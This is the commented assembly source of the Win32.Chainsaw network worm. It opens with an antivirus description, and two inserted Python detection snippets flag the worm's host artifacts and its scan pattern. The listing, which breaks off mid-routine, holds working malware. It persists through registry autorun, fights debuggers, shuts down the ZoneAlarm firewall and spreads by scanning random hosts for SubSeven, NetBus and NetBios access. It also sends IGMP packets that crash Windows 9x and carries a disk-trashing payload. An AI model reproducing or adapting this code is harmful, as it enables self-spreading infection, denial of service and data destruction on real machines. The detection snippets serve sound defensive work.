─────────────────────────────────────────────────────────────[CHAINSAW.ASM]───
; AVP description.
; ---------------------------------------------------------------------------
; Worm.Chainsaw
;
; This is a network worm with Internet spreading ability. When the worm
; is run on a system for the first time, it installs itself. To do that it
; copies itself to the Windows system directory using the filename
; WINMINE.EXE and also to the root directory of the current drive using the
; filename CHAINSAW.EXE. The latter file then gets "hidden" attribute set.
; The worm then registers itself in the system registry, auto-run key:
;
;  HKCU\Software\Microsoft\Windows\CurrentVersion\Run
;   Mines = path\WINMINE.EXE
;
; where "path" is the Windows system directory name. The worm then exits and
; triggers its infection routines when run during the next Windows startup.
;
; During the next Windows startup the worm is automatically executed by
; Windows by an auto-run key in the system registry. The worm then registers
; itself as hidden application and runs its spreading routine. That routine
; enumerates shared drives on the local networks [* It doesn't even get near
; local shares. *], gets the Windows directory on a drive (if there is one),
; copies itself to there using the filename CHAINSAW.EXE (if the drive is
; mapped for full access) and registers itself in there by writing the "Run="
; instruction to the [windows] section of the WIN.INI file on the remote
; drive. During the next Windows restart the worm copy will be activated and
; will complete the infection.
;
; When the worm is started it sends a notifying message to the
; "alt.horror" conference. The message has the fields:
;
; From: "Leatherface" <hacked.up.for@bbq.net>
; Subject: CHAINSAWED
; Newsgroups: alt.horror
; Message body:
;
;       WHO WILL SURVIVE
;       AND WHAT WILL BE LEFT OF THEM?
;
; The worm also tries to send its copies to remote machines. To do that it
; gets randomly selected IP addresses in an endless loop and tries to connect
; to them. If it succeeds the worm tries to connect to a "Backdoor" trojan
; program on the remote machine (if the machine is infected by a backdoor
; program). After successfully connecting, the worm sends its copy to the
; remote machine and forces the Backdoor to execute it there. The list of
; "supported" Backdoors is as follows: Sub7, NetBus, NetBios. It's obvious
; that the worm has a very low chance to spread itself in such a way [*
; Several worms such as VBS/NetLog and W32/Qaz use *only* NetBios to spread,
; and are currently in the wild in large numbers, try to explain this to me
; then. *]
;
; Depending on the system date the worm also sends a "Deny-of-service"
; packet to a randomly selected IP address. That packet is prepared so that
; it may cause a remote Win9x machine to crash (because of a bug in Win9x
; libraries). The worm intends to do that on the 31st of the month, but
; because of a bug compares that value with the "year" field, and as a result
; will bomb randomly selected machines only if the system date is set to the
; year 0031 [* Oops! Well at least this version has it fixed :*]
;
; The worm also disables the "ZoneAlarm" Internet protection utility.
;
; Depending on its random counter the worm spawns a trojan program that
; erases data on the hard drive by writing the text to there:
;
;  "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
;  TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
;  SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
;  THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
;  LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
;  NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
;  MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
;  SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
;  THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
;  BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
;  THE TEXAS CHAIN SAW MASSACRE..."
; ---------------------------------------------------------------------------
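
; Added example (not part of the original listing or of the AVP text): a
; host-triage check for the installation artifacts described above. The
; snapshot format (dicts and lists) and all sample values are constructed;
; the names and the 6144-byte size come from this page.

```python
import ntpath
import re

# Indicators taken from the description and listing on this page.
RUN_VALUE_NAME = "mines"       # HKCU\...\CurrentVersion\Run value name
COVER_NAME = "winmine.exe"     # copy placed in the Windows system directory
DROPPER_NAME = "chainsaw.exe"  # copy placed in a drive root / named in WIN.INI
WORM_SIZE = 6144               # Worm_Size EQU 6144 in the listing


def ini_values(text, section, key):
    """All values of `key` in [section] of INI text (names are case-insensitive)."""
    found, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[([^\]]+)\]", line)
        if header:
            current = header.group(1).strip().lower()
        elif current == section.lower() and "=" in line:
            name, _, value = line.partition("=")
            if name.strip().lower() == key.lower():
                found.append(value.strip())
    return found


def triage(run_values, system_dir, files, win_ini_text):
    """Return sorted (check, detail) findings for one host snapshot.

    run_values   : dict of value name -> data exported from the HKCU Run key
    system_dir   : the host's Windows system directory
    files        : iterable of dicts with 'path', 'size' and 'hidden'
    win_ini_text : contents of WIN.INI
    """
    findings = []
    cover_path = ntpath.normcase(ntpath.join(system_dir, COVER_NAME))

    # Run value "Mines" pointing at <system dir>\WINMINE.EXE.
    for name, data in run_values.items():
        target = ntpath.normcase(data.strip().strip('"'))
        if name.lower() == RUN_VALUE_NAME and target == cover_path:
            findings.append(("run-key", f"{name} = {data}"))

    for entry in files:
        path = ntpath.normcase(entry["path"])
        _, tail = ntpath.splitdrive(path)
        # WINMINE.EXE is also Minesweeper's file name, so the name alone is
        # weak evidence; require the worm's exact size as well.
        if path == cover_path and entry["size"] == WORM_SIZE:
            findings.append(("cover-file", entry["path"]))
        # Hidden CHAINSAW.EXE sitting directly in a drive root.
        elif (ntpath.basename(path) == DROPPER_NAME
              and ntpath.dirname(tail) == "\\" and entry["hidden"]):
            findings.append(("root-dropper", entry["path"]))

    # run= in [windows] may list several programs separated by spaces or commas.
    for value in ini_values(win_ini_text, "windows", "run"):
        for program in re.split(r"[\s,]+", value):
            if ntpath.basename(ntpath.normcase(program)) == DROPPER_NAME:
                findings.append(("win-ini-run", value))
                break
    return sorted(findings)


# Constructed snapshot, for illustration only.
SAMPLE_SYSTEM_DIR = r"C:\WINDOWS\SYSTEM"
SAMPLE_RUN = {"Mines": r"C:\WINDOWS\SYSTEM\WINMINE.EXE", "SystemTray": "SysTray.Exe"}
SAMPLE_FILES = [
    {"path": r"C:\WINDOWS\SYSTEM\WINMINE.EXE", "size": 6144, "hidden": False},
    {"path": r"C:\Chainsaw.exe", "size": 6144, "hidden": True},
    {"path": r"C:\WINDOWS\WINMINE.EXE", "size": 24336, "hidden": False},
]
SAMPLE_WIN_INI = "[windows]\nload=\nrun=C:\\WINDOWS\\CHAINSAW.EXE\n\n[Desktop]\nWallpaper=(None)\n"

if __name__ == "__main__":
    for check, detail in triage(SAMPLE_RUN, SAMPLE_SYSTEM_DIR, SAMPLE_FILES, SAMPLE_WIN_INI):
        print(f"{check:13} {detail}")
```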

;============================================================================
;
;
;      NAME: Win32.Chainsaw v1.01
;      TYPE: NetBios/SubSeven/NetBus worm.
;      DATE: July - September 2000.
;    AUTHOR: T-2000 / Immortal Riot.
;    E-MAIL: T2000_@hotmail.com
;   PAYLOAD: Sector trashing.
;
;  FEATURES:
;
;       - Disables ZoneAlarm firewall.
;       - Not visible in 9x tasklist.
;       - Sends usenet message on installation.
;       - DoS'es random hosts on 31st of any month.
;       - Anti-debugging code.
;
; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1,
; or NetBios, and then installs itself in the systems it can get access
; to. Its main payload is to IGMP DoS random Internet hosts on every 31st
; of the month, which will BSOD every released version of Windoze 95/98
; that isn't patched or firewalled.
;
;============================================================================
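
; Added example (not part of the original listing): detection logic for the
; scan pattern described above, where one source probes the same random host
; on the SubSeven, NetBus and NetBios ports almost at once. The ports are the
; ones in the listing's connect() structures; the flow-log format, the window,
; the threshold and the sample lines are assumptions constructed here.

```python
from collections import defaultdict

# Sub7_Conn, NetBus_Conn and NetBios_Conn ports from the listing.
PROBE_PORTS = frozenset({27374, 12345, 139})


def parse_flow(line):
    """Parse '<epoch seconds> <src ip> <dst ip> <dst port>' (constructed format)."""
    ts, src, dst, dport = line.split()
    return float(ts), src, dst, int(dport)


def find_triple_probers(lines, window=2.0, min_targets=3):
    """Return {src: sorted destinations} for sources that contacted all three
    probe ports on the same destination within `window` seconds, and did so
    for at least `min_targets` distinct destinations."""
    per_pair = defaultdict(list)            # (src, dst) -> [(ts, port), ...]
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = parse_flow(line)
        if dport in PROBE_PORTS:
            per_pair[(src, dst)].append((ts, dport))

    hits = defaultdict(set)
    for (src, dst), events in per_pair.items():
        events.sort()
        last_seen = {}                      # port -> most recent timestamp
        for ts, port in events:
            last_seen[port] = ts
            # All three ports seen, and the oldest of them is still in window.
            if (len(last_seen) == len(PROBE_PORTS)
                    and ts - min(last_seen.values()) <= window):
                hits[src].add(dst)
                break
    return {src: sorted(dsts) for src, dsts in hits.items()
            if len(dsts) >= min_targets}


# Constructed flow records (documentation address ranges), for illustration.
SAMPLE_FLOWS = """\
# ts      src         dst            dport
1000.00 192.0.2.10 198.51.100.7 27374
1000.01 192.0.2.10 198.51.100.7 12345
1000.02 192.0.2.10 198.51.100.7 139
1001.60 192.0.2.10 203.0.113.5 27374
1001.61 192.0.2.10 203.0.113.5 12345
1001.62 192.0.2.10 203.0.113.5 139
1003.20 192.0.2.10 198.51.100.99 27374
1003.21 192.0.2.10 198.51.100.99 12345
1003.22 192.0.2.10 198.51.100.99 139
1000.50 192.0.2.20 198.51.100.7 139
1002.00 192.0.2.20 198.51.100.8 139
1004.00 192.0.2.20 198.51.100.9 139
1000.00 192.0.2.30 203.0.113.5 27374
1300.00 192.0.2.30 203.0.113.5 12345
1600.00 192.0.2.30 203.0.113.5 139
""".splitlines()

if __name__ == "__main__":
    for src, dsts in find_triple_probers(SAMPLE_FLOWS).items():
        print(src, "probed", ", ".join(dsts))
```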

; I've kept the code clear and understandable for everyone, no optimizations
; of any kind, mainly due to the file alignment, the filesize will usually
; just stay the same whether your code is optimized or not.

                .386
                .MODEL  FLAT
                .DATA

                JUMPS

; Converts a little-endian word to a big-endian word.
DWBI            MACRO   Lil_Indian
                DW      (Lil_Indian SHR 8) + ((Lil_Indian AND 00FFh) SHL 8)
ENDM


EXTRN           WSAGetLastError:PROC
EXTRN           ioctlsocket:PROC
EXTRN           ExitProcess:PROC
EXTRN           WSAStartup:PROC
EXTRN           WritePrivateProfileStringA:PROC
EXTRN           WSACleanup:PROC
EXTRN           socket:PROC
EXTRN           closesocket:PROC
EXTRN           setsockopt:PROC
EXTRN           InternetGetConnectedState:PROC
EXTRN           DeleteFileA:PROC
EXTRN           connect:PROC
EXTRN           setsockopt:PROC
EXTRN           PeekMessageA:PROC
EXTRN           SetFileAttributesA:PROC
EXTRN           GetSystemDirectoryA:PROC
EXTRN           CreateFileA:PROC
EXTRN           recv:PROC
EXTRN           send:PROC
EXTRN           sendto:PROC
EXTRN           CloseHandle:PROC
EXTRN           GetSystemTime:PROC
EXTRN           GetModuleHandle
EXTRN           RegOpenKeyExA:PROC
EXTRN           RegSetValueExA:PROC
EXTRN           RegCloseKey:PROC
EXTRN           ReadFile:PROC
EXTRN           CopyFileA:PROC
EXTRN           WNetAddConnection2A:PROC
EXTRN           WNetCancelConnection2A:PROC
EXTRN           SetErrorMode:PROC
EXTRN           GetModuleFileNameA:PROC
EXTRN           FindWindowA:PROC
EXTRN           PostMessageA:PROC
EXTRN           GetTickCount:PROC
EXTRN           WriteFile:PROC
EXTRN           GetLocalTime:PROC
EXTRN           WinExec:PROC
EXTRN           select:PROC
EXTRN           GetPrivateProfileStringA:PROC
EXTRN           GetModuleHandleA:PROC
EXTRN           GetProcAddress:PROC
EXTRN           WNetAddConnection2A:PROC
EXTRN           WNetEnumResourceA:PROC
EXTRN           WNetOpenEnumA:PROC
EXTRN           WNetCloseEnum:PROC
EXTRN           RegQueryValueExA:PROC
EXTRN           gethostbyname:PROC
EXTRN           inet_ntoa:PROC


Worm_Size                       EQU     6144

SEM_NOGPFAULTERRORBOX           EQU     00000002h
OPEN_EXISTING                   EQU     00000003h
CREATE_ALWAYS                   EQU     00000002h
SO_SNDTIMEO                     EQU     1005h
SO_RCVTIMEO                     EQU     1006h
RESOURCE_GLOBALNET              EQU     00000002h
RESOURCEUSAGE_CONNECTABLE       EQU     00000001h
RESOURCEUSAGE_CONTAINER         EQU     00000002h
RESOURCEUSAGE_CONNECTABLE       EQU     00000001h
RESOURCETYPE_DISK               EQU     00000001h
SOL_SOCKET                      EQU     0FFFFh
HKEY_CURRENT_USER               EQU     80000001h
KEY_QUERY_VALUE                 EQU     1
KEY_WRITE                       EQU     00020006h
REG_SZ                          EQU     00000001h
GENERIC_READ                    EQU     80000000h
GENERIC_WRITE                   EQU     40000000h
FILE_SHARE_READ                 EQU     00000001h
FILE_ATTRIBUTE_HIDDEN           EQU     2
AF_INET                         EQU     2
IPPROTO_IGMP                    EQU     2
SOCK_STREAM                     EQU     1
SOCK_RAW                        EQU     3
FIONBIO                         EQU     8004667Eh
WM_QUIT                         EQU     0012h


S7_Upload_Req   DB      'RTFChainsaw.exe'
End_S7_Upload_Req:

S7_Upload_Size  DB      'SFT046144'
End_S7_Upload_Size:

S7_Exec_Req     DB      'FMXChainsaw.exe'
End_S7_Exec_Req:

NB_Password     DB      'Password;1;netbus', 0Dh
End_NB_Password:

NB_Upload_Req   DB      'UploadFile;Chainsaw.exe;6144;\', 0Dh
End_NB_Upload_Req:

NB_Exec_File    DB      'StartApp;\Chainsaw.exe', 0Dh
End_NB_Exec_File:

Nuke_File       DB      'BBQ666.COM', 0

sz_Kernel32     DB      'KERNEL32', 0
sz_RegServProc  DB      'RegisterServiceProcess', 0

Win_Ini_Run_Key DB      'run', 0
Windows_Section DB      'windows', 0

Run_Key                 DB      'Software\Microsoft\Windows\CurrentVersion\Run', 0
ZoneAlarm_Window        DB      'ZoneAlarm', 0

Reg_Handle_1            DD      0
Reg_Handle_2            DD      0
sz_Account_Mgr          DB      'Software\Microsoft\Internet Account Manager', 0
Account_Key             DB      'Software\Microsoft\Internet Account Manager\Accounts\'
Account_Index           DB      '00000000', 0
sz_Def_News_Acc         DB      'Default News Account', 0
sz_NNTP_Server          DB      'NNTP Server', 0

Size_Acc_Buffer         DD      9
Size_NNTP_Buf           DD      128

s_POST          DB      'POST', 0Dh, 0Ah
s_QUIT          DB      'QUIT', 0Dh, 0Ah

                ; Header.

News_Message:   DB      'From: "Leatherface" <hacked.up.for@bbq.net>', 0Dh, 0Ah
                DB      'Subject: CHAINSAWED', 0Dh, 0Ah
                DB      'Newsgroups: alt.horror', 0Dh, 0Ah
                DB      0Dh, 0Ah

                ; Body.

                DB      'WHO WILL SURVIVE', 0Dh, 0Ah
                DB      'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah

                ; End-of-data command.

                DB      '.', 0Dh, 0Ah
End_News_Message:

MsDos_Sys       DB      'T:\MSDOS.SYS', 0
Win_Dir_Key     DB      'WinDir', 0
Paths_Section   DB      'Paths', 0

Slash_Win_Ini   DB      '\'
Win_Ini         DB      'WIN.INI', 0

Remote_Drive    DB      'T:', 0
Cover_Name      DB      '\WINMINE.EXE', 0

Remote_Trojan   DB      'T:'
Root_Dropper    DB      '\Chainsaw.exe', 0
Run_Key_Name    DB      'Mines', 0

Boole_False     DD      0
Boole_True      DD      1

NetBios_Remote  DB      '\\666.666.666.666', 0

Time_Out:       DD      1               ; - Seconds.
                DD      500             ; - Milliseconds.

IO_Time_Out     DD      5000

Usenet_Conn:    DW      AF_INET         ; connect() structures.
                DWBI    119
Usenet_IP       DD      0
                DB      8 DUP(0)

Nuke_Conn:      DW      AF_INET
                DW      0
Nuke_IP         DD      0
                DB      8 DUP(0)

Sub7_Conn:      DW      AF_INET
                DWBI    27374
Sub7_IP         DD      0
                DB      8 DUP(0)

NetBus_Conn:    DW      AF_INET
                DWBI    12345
NetBus_IP       DD      0
                DB      8 DUP(0)

NetBus_Conn_2:  DW      AF_INET
                DWBI    (12345+1)
NetBus_IP_2     DD      0
                DB      8 DUP(0)

NetBios_Conn:   DW      AF_INET
                DWBI    139
NetBios_IP      DD      0
                DB      8 DUP(0)

Win_Dir         DB      260 DUP(0)
Default_String  DB      0

Own_Path        DB      260 DUP(0)

Net_Struc_Count DD      1
Enum_Buf_Size   DD      666
Enum_Buffer     DB      666 DUP(0)

Net_Resource_Struc:

                DD      0
                DD      0
                DD      0
                DD      0
                DD      0
                DD      OFFSET NetBios_Remote
                DD      0
                DD      0

Net_Resource:   DD      0
                DD      0
                DD      0
Net_Usage       DD      0
Net_Local_Name  DD      0
Net_Remote_Name DD      0
                DD      0
                DD      0

Select_Struc:
Sock_Count      DD      3
Sub7_Socket     DD      0
NetBus_Socket   DD      0
NetBios_Socket  DD      0

IGMP_Socket     DD      0
News_Socket     DD      0
NetBus_Socket_2 DD      0

Connect_Select: DD      4 DUP(0)

IGMP_Nuke       DB      15000 DUP(0)

Temp            DD      0
Random_Init     DD      0

Enum_Handle     DD      0

Size_Cover_Path DD      0

System_Time     DW      8 DUP(0)

Worm_Code       DB      Worm_Size DUP(0)
WSA_Data        DB      400 DUP(0)
System_Dir      DB      260 DUP(0)
NNTP_Server     DB      128 DUP(0)
Buffer          DB      512 DUP(0)

                .CODE

                DB      '[-T2IR-]', 0
START:
                PUSH    SEM_NOGPFAULTERRORBOX   ; On error just bail out
                CALL    SetErrorMode            ; without displaying shit.

                PUSH    0                       ; Fake a dispatch to get the
                PUSH    0                       ; hourglass cursor to
                PUSH    0                       ; disappear.
                PUSH    0
                PUSH    0
                CALL    PeekMessageA

                ; Get offset of CreateFileA in the jump table.

                MOV     ESI, DWORD PTR CreateFileA+2
                LODSD

                ; Soft-Ice's BPX command works with 0CCh breakpoints
                ; to hook API's, so here we simply check if a common
                ; API has been hooked and kill the system if true.
                ; For a virus it's better to check every fetched API
                ; for a debugger hook.

                CMP     BYTE PTR [ESI], 0CCh    ; Debugger has a hook on it?
                JE      Payload

                CALL    GetTickCount

                MOV     Random_Init, EAX

                PUSH    260                     ; Get the path to ourself.
                PUSH    OFFSET Own_Path
                PUSH    0
                CALL    GetModuleFileNameA

                MOV     EDI, OFFSET System_Dir

                PUSH    260                     ; Get the System directory.
                PUSH    EDI
                CALL    GetSystemDirectoryA

                MOV     ESI, OFFSET Cover_Name
                ADD     EDI, EAX

                MOVSD                           ; Append our cover name
                MOVSD                           ; \WINMINE.EXE to it.
                MOVSD
                MOVSB

                SUB     EDI, OFFSET System_Dir  ; Save size of path.
                MOV     Size_Cover_Path, EDI

                PUSH    1                       ; Copy us to the system
                PUSH    OFFSET System_Dir       ; directory under the cover
                PUSH    OFFSET Own_Path         ; name.
                CALL    CopyFileA

                XCHG    ECX, EAX                ; Virus is already installed?
                JECXZ   Check_Trigger

                PUSH    1                       ; Copy root dropper to root
                PUSH    OFFSET Root_Dropper     ; to indicate this is the 1st
                PUSH    OFFSET Own_Path         ; run of the worm.
                CALL    CopyFileA

                PUSH    FILE_ATTRIBUTE_HIDDEN   ; Hide it.
                PUSH    OFFSET Root_Dropper
                CALL    SetFileAttributesA

                PUSH    OFFSET Reg_Handle_1     ; Open up a handle to the
                PUSH    KEY_WRITE               ; registry Run key.
                PUSH    0
                PUSH    OFFSET Run_Key
                PUSH    HKEY_CURRENT_USER
                CALL    RegOpenKeyExA

                PUSH    Size_Cover_Path         ; Make the cover file run
                PUSH    OFFSET System_Dir       ; every bootup.
                PUSH    REG_SZ
                PUSH    0
                PUSH    OFFSET Run_Key_Name
                PUSH    Reg_Handle_1
                CALL    RegSetValueExA

                PUSH    Reg_Handle_1            ; Close registry key.
                CALL    RegCloseKey

                PUSH    OFFSET Win_Ini          ; Remove temporary reference
                PUSH    0                       ; to virus dropper in
                PUSH    OFFSET Win_Ini_Run_Key  ; WIN.INI.
                PUSH    OFFSET Windows_Section
                CALL    WritePrivateProfileStringA

Exit:           PUSH    0
                CALL    ExitProcess

Check_Trigger:  MOV     EAX, 666                ; 1/666 chance of activating.
                CALL    Random_EAX

                DEC     EAX                     ; Today is trashday?
                JZ      Payload

                PUSH    0                       ; Open ourselves.
                PUSH    0
                PUSH    OPEN_EXISTING
                PUSH    0
                PUSH    FILE_SHARE_READ
                PUSH    GENERIC_READ
                PUSH    OFFSET Own_Path
                CALL    CreateFileA

                MOV     EBX, EAX

                INC     EAX
                JZ      Exit

                PUSH    0                       ; Read in ourselves.
                PUSH    OFFSET Temp
                PUSH    Worm_Size+1
                PUSH    OFFSET Worm_Code
                PUSH    EBX
                CALL    ReadFile

                CMP     Temp, Worm_Size         ; Wormsize has changed?
                JNE     Payload                 ; Then we're likely
                                                ; incomplete or infected
                                                ; with a virus.

                PUSH    EBX                     ; Close ourselves again.
                CALL    CloseHandle

                PUSH    OFFSET sz_Kernel32      ; Get base of KERNEL32.DLL.
                CALL    GetModuleHandleA

                PUSH    OFFSET sz_RegServProc   ; Get RegisterServiceProcess.
                PUSH    EAX
                CALL    GetProcAddress

                XCHG    ECX, EAX
                JECXZ   Init_Winsock

                PUSH    1                       ; Register our process as a
                PUSH    0                       ; hidden service.
                CALL    ECX

Init_Winsock:   PUSH    OFFSET WSA_Data         ; Initialize winsock.
                PUSH    0202h
                CALL    WSAStartup

                OR      EAX, EAX                ; Error?
                JNZ     Exit

Chk_Inet_State: PUSH    0                       ; We're connected to the
                PUSH    OFFSET Temp             ; Internet?
                CALL    InternetGetConnectedState

                DEC     EAX                     ; Else just loop and check
                JNZ     Chk_Inet_State          ; again until we are.

                ; Here we close the ZoneAlarm firewall if it is
                ; found active, reason being that A) it will pop-up
                ; a warning box whenever a program (ie. our worm)
                ; is attempting to access the Internet, (this is how
                ; many RAT trojans get caught these days) and B) it
                ; is likely to block our ports.

                PUSH    OFFSET ZoneAlarm_Window ; Attempt to locate the
                PUSH    0                       ; ZoneAlarm window.
                CALL    FindWindowA

                XCHG    ECX, EAX
                JECXZ   Check_1st_Run

                PUSH    0                       ; Tell ZoneAlarm to quit.
                PUSH    0
                PUSH    WM_QUIT
                PUSH    ECX
                CALL    PostMessageA

Check_1st_Run:  PUSH    OFFSET Root_Dropper     ; Can we delete the root
                CALL    DeleteFileA             ; dropper?

                XCHG    ECX, EAX
                JECXZ   Do_Random_IP

                ; This is the first Internet run of the worm, so
                ; send a usenet message to alt.horror to note
                ; our presence. Better to just use a public
                ; dump place instead of e-mail for example, this
                ; way they can't track you or kill the account.

                PUSH    OFFSET Reg_Handle_1     ; Open a handle to Internet
                PUSH    KEY_QUERY_VALUE         ; Account Manager.
                PUSH    0
                PUSH    OFFSET sz_Account_Mgr
                PUSH    HKEY_CURRENT_USER
                CALL    RegOpenKeyExA

                OR      EAX, EAX
                JNZ     Do_Random_IP

                PUSH    OFFSET Size_Acc_Buffer  ; Get default news account.
                PUSH    OFFSET Account_Index
                PUSH    0
                PUSH    0
                PUSH    OFFSET sz_Def_News_Acc
                PUSH    Reg_Handle_1
                CALL    RegQueryValueExA

                OR      EAX, EAX
                JNZ     Close_Reg_1

                PUSH    OFFSET Reg_Handle_2     ; Open the default news
                PUSH    KEY_QUERY_VALUE         ; account.
                PUSH    0
                PUSH    OFFSET Account_Key
                PUSH    HKEY_CURRENT_USER
                CALL    RegOpenKeyExA

                OR      EAX, EAX
                JNZ     Close_Reg_1

                PUSH    OFFSET Size_NNTP_Buf    ; Get its NNTP server.
                PUSH    OFFSET NNTP_Server
                PUSH    0
                PUSH    0
                PUSH    OFFSET sz_NNTP_Server
                PUSH    Reg_Handle_2
                CALL    RegQueryValueExA

                OR      EAX, EAX
                JNZ     Close_Reg_2

                PUSH    OFFSET NNTP_Server      ; Convert the DNS-name to
                CALL    gethostbyname           ; an IP-address.

                XCHG    ECX, EAX
                JECXZ   Close_Reg_2

                MOV     ESI, [ECX+12]           ; Fetch IP-address.
                LODSD
                PUSH    DWORD PTR [EAX]
                POP     Usenet_IP

                PUSH    0
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     News_Socket, EAX

                INC     EAX                     ; Error?
                JZ      Close_Reg_2

                MOV     EBX, News_Socket
                CALL    Set_Time_Outs

                PUSH    16
                PUSH    OFFSET Usenet_Conn
                PUSH    News_Socket
                CALL    connect

                INC     EAX
                JZ      Close_Reg_2

                MOV     EDI, OFFSET Buffer

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

                INC     EAX
                JZ      Close_News

                CMP     BYTE PTR [EDI], '2'
                JNE     Send_QUIT

                PUSH    0
                PUSH    6
                PUSH    OFFSET s_POST
                PUSH    News_Socket
                CALL    send

                INC     EAX
                JZ      Close_News

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

                INC     EAX
                JZ      Close_News

                CMP     BYTE PTR [EDI], '3'
                JNE     Send_QUIT

                PUSH    0
                PUSH    (End_News_Message-News_Message)
                PUSH    OFFSET News_Message
                PUSH    News_Socket
                CALL    send

                INC     EAX
                JZ      Close_News

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

                INC     EAX
                JZ      Close_News

Send_QUIT:      PUSH    0
                PUSH    6
                PUSH    OFFSET s_QUIT
                PUSH    News_Socket
                CALL    send

                INC     EAX
                JZ      Close_News

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

Close_News:     PUSH    News_Socket
                CALL    closesocket

Close_Reg_2:    PUSH    Reg_Handle_2
                CALL    RegCloseKey

Close_Reg_1:    PUSH    Reg_Handle_1
                CALL    RegCloseKey

Do_Random_IP:   CALL    Random_AL_254           ; Get random octet (1-254).

                XCHG    EBX, EAX

                CALL    Random_AL_254           ; Another one.

                SHL     EBX, 8
                MOV     BL, AL

                CALL    Random_AL_254           ; And another one.

                SHL     EBX, 8
                MOV     BL, AL

Rand_A_Class:   MOV     AL, 223                 ; Random A/B/C class IP.
                CALL    Random_AL

                CMP     AL, 10                  ; Private network segment.
                JE      Rand_A_Class

                CMP     AL, 127                 ; Localhost network.
                JE      Rand_A_Class

                SHL     EBX, 8
                MOV     BL, AL

                MOV     Nuke_IP, EBX
                MOV     Sub7_IP, EBX            ; Store the random IP in our
                MOV     NetBus_IP, EBX          ; structures.
                MOV     NetBus_IP_2, EBX
                MOV     NetBios_IP, EBX

                PUSH    OFFSET System_Time      ; Get system date.
                CALL    GetSystemTime

                CMP     System_Time+(3*2), 31   ; Is today nuke day?
                JNE     IP_To_ASCIIZ

                PUSH    IPPROTO_IGMP            ; Create a raw IGMP socket.
                PUSH    SOCK_RAW
                PUSH    AF_INET
                CALL    socket

                MOV     IGMP_Socket, EAX

                INC     EAX
                JZ      Do_Random_IP

                MOV     EDI, 10                 ; Send 10 nuke packets.

        ; Windows 95/98 has problems with handling fragmented IGMP
        ; packets, when processing a whole bunch of these the system
        ; will usually BSOD. Here we simply send a large packet (the
        ; packet will arrive regardless of content it seems), which
        ; will automatically be fragmented by the underlying TCP/IP
        ; layers. Officially IGMP packets aren't supposed to leave
        ; the current subnet, so if your ISP uses filtering (mainly
        ; cable/ADSL connections), this nuke won't get through,
        ; however SLIP/PPP connections (mainly dialups), seem to have
        ; no problems delivering it.

Send_Nuke:      PUSH    16                      ; Send the nuke.
                PUSH    OFFSET Nuke_Conn
                PUSH    0
                PUSH    15000
                PUSH    OFFSET IGMP_Nuke
                PUSH    IGMP_Socket
                CALL    sendto

                DEC     EDI                     ; Send all 10 packets.
                JNZ     Send_Nuke

Exit_Nuke:      PUSH    IGMP_Socket
                CALL    closesocket

                JMP     Do_Random_IP

IP_To_ASCIIZ:   PUSH    EBX                     ; Convert DWORD to ASCIIZ
                CALL    inet_ntoa               ; for the NetBios API's.

                XCHG    ESI, EAX
                MOV     EDI, OFFSET NetBios_Remote+2

                ; Copy the ASCIIZ IP to our own buffer.

Copy_ASCIIZ_IP: LODSB
                STOSB

                OR      AL, AL                  ; Did entire ASCIIZ string?
                JNZ     Copy_ASCIIZ_IP

                PUSH    0                       ; Create sockets.
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     Sub7_Socket, EAX

                INC     EAX
                JZ      Chk_Inet_State

                PUSH    0
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     NetBus_Socket, EAX

                INC     EAX
                JZ      Close_Sub7

                PUSH    0
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     NetBios_Socket, EAX

                INC     EAX
                JZ      Close_NetBus

        ; The standard connect() timeout interval is like 100 seconds
        ; or so, obviously this is way too long for portscanning, so we
        ; need to set our own timeout interval. Unfortunately Winsock
        ; does not have any API that can set a connect() timeout interval
        ; (neither does BSD Sockets btw). Kind of stupid, but anyways,
        ; here we realize our own timeout function by first switching
        ; the connect() sockets to non-blocking mode, and then running
        ; select() on em with a 1500ms timeout to see if they are connected.

                PUSH    OFFSET Boole_True       ; Set socket to non-blocking
                PUSH    FIONBIO                 ; mode.
                PUSH    Sub7_Socket
                CALL    ioctlsocket

                PUSH    OFFSET Boole_True
                PUSH    FIONBIO
                PUSH    NetBus_Socket
                CALL    ioctlsocket

                PUSH    OFFSET Boole_True
                PUSH    FIONBIO
                PUSH    NetBios_Socket
                CALL    ioctlsocket

                PUSH    16                      ; Connect SubSeven port.
                PUSH    OFFSET Sub7_Conn
                PUSH    Sub7_Socket
                CALL    connect

                PUSH    16                      ; Connect NetBus port.
                PUSH    OFFSET NetBus_Conn
                PUSH    NetBus_Socket
                CALL    connect

                PUSH    16                      ; Connect NetBios port.
                PUSH    OFFSET NetBios_Conn     ; (only to quickly probe the
                PUSH    NetBios_Socket          ; host for NetBios).
                CALL    connect

                MOV     ESI, OFFSET Select_Struc
                MOV     EDI, OFFSET Connect_Select

                MOVSD
                MOVSD
                MOVSD
                MOVSD

                PUSH    OFFSET Time_Out         ; Check if any sockets are
                PUSH    0                       ; writeable (connected)
